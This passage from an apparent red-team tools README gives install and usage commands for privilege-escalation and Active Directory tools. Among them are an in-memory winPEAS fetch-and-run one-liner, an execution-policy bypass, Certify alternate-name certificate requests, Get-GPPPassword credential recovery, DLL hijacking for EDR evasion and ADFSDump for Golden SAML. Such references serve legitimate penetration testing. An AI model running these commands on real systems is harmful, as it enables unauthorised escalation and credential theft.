data-snippet-clipboard-copy-content="$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")"><pre><span class="pl-smi">$wp</span>=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest <span class="pl-s"><span class="pl-pds">"</span>https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe<span class="pl-pds">"</span></span> -UseBasicParsing <span class="pl-k">|</span> Select-Object 
-ExpandProperty Content))<span class="pl-k">;</span> [winPEAS.Program]::Main(<span class="pl-s"><span class="pl-pds">"</span><span class="pl-pds">"</span></span>)</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png"><img src="https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/diego-treitos/linux-smart-enumeration">linux-smart-enumeration</a></h3><a id="user-content-linux-smart-enumeration" class="anchor" aria-label="Permalink: 🔙linux-smart-enumeration" href="#linux-smart-enumeration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">linux-smart-enumeration (<code>lse.sh</code>) is another good Linux privesc enumeration script, less verbose than LinPEAS by default. Unlike the LinPEAS one-liner above, the command below saves the script to disk and makes it executable for the current user only (<code>chmod 700</code>) rather than piping it into a shell, so you can review it before executing <code>./lse.sh</code>.</p> <p dir="auto"><strong>Install + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh"><pre>curl <span class="pl-s"><span 
class="pl-pds">"</span>https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh<span class="pl-pds">"</span></span> -Lo lse.sh<span class="pl-k">;</span>chmod 700 lse.sh</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png"><img src="https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/Certify">Certify</a></h3><a id="user-content-certify" class="anchor" aria-label="Permalink: 🔙Certify" href="#certify"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).</p> <p dir="auto">Certify itself only enumerates CAs and certificate templates and requests certificates; it does not perform man-in-the-middle attacks. Its typical use, shown in the usage section below, is to find a template with an abusable configuration and request a certificate from it with an alternate subject name for a privileged account. Authenticating with the resulting certificate is then done with other tooling; see the full example walkthrough linked below.</p> <p dir="auto"><strong>Key features of Certify:</strong></p> <ul dir="auto"> 
<li>Enumerating CAs and certificate templates and flagging abusable configurations (<code>find /vulnerable</code>)</li> <li>Requesting a certificate from a chosen CA and template (<code>request /ca:... /template:...</code>)</li> <li>Requesting with an alternate subject name (<code>/altname</code>) so the issued certificate identifies another principal</li> </ul> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Certify is compatible with <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a>. Open the Certify project <a href="https://github.com/GhostPack/Certify">.sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Install: (Running Certify Through PowerShell)</strong></p> <p dir="auto">If you want to run Certify in-memory through a PowerShell wrapper, first compile Certify and base64-encode the resulting assembly:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt"><pre>[Convert]::ToBase64String([IO.File]::ReadAllBytes(<span class="pl-s"><span class="pl-pds">"</span>C:\Temp\Certify.exe<span class="pl-pds">"</span></span>)) <span class="pl-k">|</span> Out-File -Encoding ASCII C:<span class="pl-cce">\T</span>emp<span class="pl-cce">\C</span>ertify.txt</pre></div> <p dir="auto">Certify can then be loaded in a PowerShell script with the following (where "aa..." 
is replaced with the base64-encoded Certify assembly string):</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))"><pre class="notranslate"><code>$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa...")) </code></pre></div> <p dir="auto">The Main() method and any arguments can then be invoked as follows:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="[Certify.Program]::Main("find /vulnerable".Split())"><pre class="notranslate"><code>[Certify.Program]::Main("find /vulnerable".Split()) </code></pre></div> <p dir="auto">Full compile instructions can be found <a href="https://github.com/GhostPack/Certify#compile-instructions">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# See if there are any vulnerable templates Certify.exe find /vulnerable # Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin"><pre><span class="pl-c"><span class="pl-c">#</span> See if there are any vulnerable templates</span> Certify.exe find /vulnerable <span class="pl-c"><span class="pl-c">#</span> Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal</span> Certify.exe request /ca:dc.theshire.local<span class="pl-cce">\t</span>heshire-DC-CA /template:VulnTemplate /altname:localadmin</pre></div> <p dir="auto">Full example walkthrough can be found <a href="https://github.com/GhostPack/Certify#example-walkthrough">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" 
href="https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png"><img src="https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1">Get-GPPPassword</a></h3><a id="user-content-get-gpppassword" class="anchor" aria-label="Permalink: 🔙Get-GPPPassword" href="#get-gpppassword"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Get-GPPPassword is a PowerShell script from the PowerSploit toolkit that retrieves the passwords of local accounts created or managed through Group Policy Preferences (GPP).</p> <p dir="auto">Get-GPPPassword works by searching the SYSVOL share on the domain controller, which any authenticated domain user can read, for GPP XML files that carry a <code>cpassword</code> value. 
Once it finds these files, it decrypts the password values (GPP encrypts them with a fixed AES key that Microsoft has published, so no secret is needed) and displays them to the user.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Follow the PowerSploit <a href="https://github.com/A-poc/RedTeam-Tools#powersploit">installation instructions</a> from this tool sheet.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="powershell.exe -ep bypass Import-Module PowerSploit"><pre>powershell.exe -ep bypass Import-Module PowerSploit</pre></div> <p dir="auto">As written, <code>powershell.exe</code> treats <code>Import-Module PowerSploit</code> as a one-off command and exits once it finishes, so the module is not available afterwards. Either add <code>-NoExit</code>, or start the <code>-ep bypass</code> session first and run <code>Import-Module PowerSploit</code> inside it.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Get all passwords with additional information Get-GPPPassword # Get list of all passwords Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq"><pre><span class="pl-c"><span class="pl-c">#</span> Get all passwords with additional information</span> Get-GPPPassword <span class="pl-c"><span class="pl-c">#</span> Get list of all passwords</span> Get-GPPPassword <span class="pl-k">|</span> ForEach-Object {<span class="pl-smi">$_</span>.passwords} <span class="pl-k">|</span> Sort-Object -Uniq</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png"><img src="https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/rasta-mouse/Sherlock">Sherlock</a></h3><a id="user-content-sherlock" class="anchor" aria-label="Permalink: 🔙Sherlock" href="#sherlock"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path 
d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.</p> <p dir="auto"><em>Supports:</em></p> <ul dir="auto"> <li>MS10-015 : User Mode to Ring (KiTrap0D)</li> <li>MS10-092 : Task Scheduler</li> <li>MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow</li> <li>MS13-081 : TrackPopupMenuEx Win32k NULL Page</li> <li>MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference</li> <li>MS15-051 : ClientCopyImage Win32k</li> <li>MS15-078 : Font Driver Buffer Overflow</li> <li>MS16-016 : 'mrxdav.sys' WebDAV</li> <li>MS16-032 : Secondary Logon Handle</li> <li>MS16-034 : Windows Kernel-Mode Drivers EoP</li> <li>MS16-135 : Win32k Elevation of Privilege</li> <li>CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc</li> </ul> <p dir="auto"><strong>Install: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Git install git clone https://github.com/rasta-mouse/Sherlock # Load powershell module Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1"><pre><span class="pl-c"><span class="pl-c">#</span> Git install</span> git clone https://github.com/rasta-mouse/Sherlock <span class="pl-c"><span class="pl-c">#</span> Load powershell module</span> Import-Module -Name C:<span class="pl-cce">\I</span>NSTALL_LOCATION<span class="pl-cce">\S</span>herlock<span 
class="pl-cce">\S</span>herlock.ps1</pre></div> <p dir="auto"><strong>Usage: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run all functions Find-AllVulns # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference) Find-MS14058"><pre><span class="pl-c"><span class="pl-c">#</span> Run all functions</span> Find-AllVulns <span class="pl-c"><span class="pl-c">#</span> Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)</span> Find-MS14058</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png"><img src="https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/" rel="nofollow">https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/rasta-mouse/Watson">Watson</a></h3><a id="user-content-watson" class="anchor" aria-label="Permalink: 🔙Watson" href="#watson"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.</p> <p dir="auto">Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Using <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a>. Open the <a href="https://github.com/rasta-mouse/Watson">Watson project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run all checks Watson.exe"><pre><span class="pl-c"><span class="pl-c">#</span> Run all checks</span> Watson.exe</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png"><img src="https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image text used from <a href="https://github.com/rasta-mouse/Watson#usage">https://github.com/rasta-mouse/Watson#usage</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/knight0x07/ImpulsiveDLLHijack">ImpulsiveDLLHijack</a></h3><a id="user-content-impulsivedllhijack" class="anchor" aria-label="Permalink: 🔙ImpulsiveDLLHijack" href="#impulsivedllhijack"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" 
height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A C# based tool that automates the process of discovering and exploiting DLL hijacks in target binaries.</p> <p dir="auto">The discovered hijackable paths can be weaponized, during an engagement, to evade EDRs.</p> <p dir="auto"><strong>Install:</strong></p> <ul dir="auto"> <li><strong>Procmon.exe</strong> -> <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon" rel="nofollow">https://docs.microsoft.com/en-us/sysinternals/downloads/procmon</a></li> <li><strong>Custom confirmatory DLLs</strong> : <ul dir="auto"> <li>These are DLL files which let the tool confirm whether a DLL is actually loaded from the identified hijack path</li> <li>Compiled from the MalDLL project in the ImpulsiveDLLHijack repository (or use the precompiled binaries, if you trust the author's builds)</li> <li>32-bit DLL name should be: maldll32.dll</li> <li>64-bit DLL name should be: maldll64.dll</li> <li>Install the NuGet package <strong>PeNet</strong> -> <a href="https://www.nuget.org/packages/PeNet/" rel="nofollow">https://www.nuget.org/packages/PeNet/</a> (prerequisite when compiling the ImpulsiveDLLHijack project)</li> </ul> </li> </ul> <p dir="auto"><strong>Note: the Procmon.exe and confirmatory DLL prerequisites should be placed in the same directory as ImpulsiveDLLHijack.exe.</strong></p> <ul dir="auto"> <li> <p dir="auto"><strong>Build and Setup Information:</strong></p> <ul dir="auto"> <li> <p 
dir="auto"><strong>ImpulsiveDLLHijack</strong></p> <ul dir="auto"> <li>Clone the repository in Visual Studio</li> <li>Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> <a href="https://www.nuget.org/packages/PeNet/" rel="nofollow">https://www.nuget.org/packages/PeNet/</a></li> <li>Build the project!</li> <li>The ImpulsiveDLLHijack.exe will be inside the bin directory.</li> </ul> </li> <li> <p dir="auto"><strong>And for Confirmatory DLL's:</strong></p> <ul dir="auto"> <li>Clone the repository in Visual Studio</li> <li>Build the project with x86 and x64</li> <li>Rename x86 release as maldll32.dll and x64 release as maldll64.dll</li> </ul> </li> <li> <p dir="auto"><strong>Setup:</strong> Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))</p> </li> </ul> </li> </ul> <p dir="auto"><em>Install instructions from <a href="https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites">https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites</a></em></p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Help ImpulsiveDLLHijack.exe -h # Look for vulnerabilities in an executable ImpulsiveDLLHijack.exe -path BINARY_PATH"><pre><span class="pl-c"><span class="pl-c">#</span> Help</span> ImpulsiveDLLHijack.exe -h <span class="pl-c"><span class="pl-c">#</span> Look for vulnerabilities in an executable </span> ImpulsiveDLLHijack.exe -path BINARY_PATH</pre></div> <p dir="auto">Usage examples can be found <a href="https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png"><img 
src="https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples">https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mandiant/ADFSDump">ADFSDump</a></h3><a id="user-content-adfsdump" class="anchor" aria-label="Permalink: 🔙ADFSDump" href="#adfsdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A C# tool to dump all sorts of goodies from AD FS.</p> <p dir="auto">Created by Doug Bienstock <a href="https://twitter.com/doughsec" rel="nofollow">@doughsec</a> while at Mandiant FireEye.</p> <p dir="auto">This tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.</p> <p dir="auto"><strong>Requirements:</strong></p> <ul dir="auto"> <li>ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. 
Only the AD FS service account has the permissions needed to access the configuration database; not even a DA can access it directly.</li> <li>ADFSDump was written for deployments that use the Windows Internal Database (WID). Note that the flag list below includes a <code>/database</code> option for a SQL connection string when AD FS uses a remote MS SQL server, so the upstream statement that external SQL is unsupported appears to predate that flag; check the version you build.</li> <li>ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.</li> </ul> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">ADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose "Release", and build.</p> <p dir="auto"><strong>Usage: (Flags)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# The Active Directory domain to target. Defaults to the current domain. /domain: # The Domain Controller to target. Defaults to the current DC. /server: # Switch. Toggle to disable outputting the DKM key. /nokey # (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. /database"><pre><span class="pl-c"><span class="pl-c">#</span> The Active Directory domain to target. Defaults to the current domain.</span> /domain: <span class="pl-c"><span class="pl-c">#</span> The Domain Controller to target. Defaults to the current DC.</span> /server: <span class="pl-c"><span class="pl-c">#</span> Switch. 
Toggle to disable outputting the DKM key.</span> /nokey <span class="pl-c"><span class="pl-c">#</span> (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.</span> /database</pre></div> <p dir="auto"><a href="https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs" rel="nofollow">Blog - Exploring the Golden SAML Attack Against ADFS</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png"><img src="https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs" rel="nofollow">https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/AlessandroZ/BeRoot">BeRoot</a></h3><a id="user-content-beroot" class="anchor" aria-label="Permalink: 🔙BeRoot" href="#beroot"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">BeRoot Project is a post 
exploitation tool to check common misconfigurations to find a way to escalate our privileges.</p> <p dir="auto">The goal of BeRoot is to only output potential privilege escalation opportunities and not an endpoint configuration assessment.</p> <p dir="auto">This project works on Windows, Linux and Mac OS.</p> <p dir="auto"><strong>Install: (Linux)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/"><pre>git clone https://github.com/AlessandroZ/BeRoot <span class="pl-c1">cd</span> BeRoot/Linux/</pre></div> <p dir="auto"><strong>Install: (Windows)</strong></p> <p dir="auto">A pre-compiled version of BeRoot can be found <a href="https://github.com/AlessandroZ/BeRoot/releases">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run BeRoot python beroot.py # Run BeRoot with user password (If you know the password use it, you could get more results) python beroot.py --password super_strong_password"><pre><span class="pl-c"><span class="pl-c">#</span> Run BeRoot</span> python beroot.py <span class="pl-c"><span class="pl-c">#</span> Run BeRoot with user password (If you know the password use it, you could get more results)</span> python beroot.py --password super_strong_password</pre></div> <p dir="auto">Further information can be found here for:</p> <ul dir="auto"> <li><a href="https://github.com/AlessandroZ/BeRoot/tree/master/Linux">Linux</a></li> <li><a href="https://github.com/AlessandroZ/BeRoot/tree/master/Windows">Windows</a></li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer" 
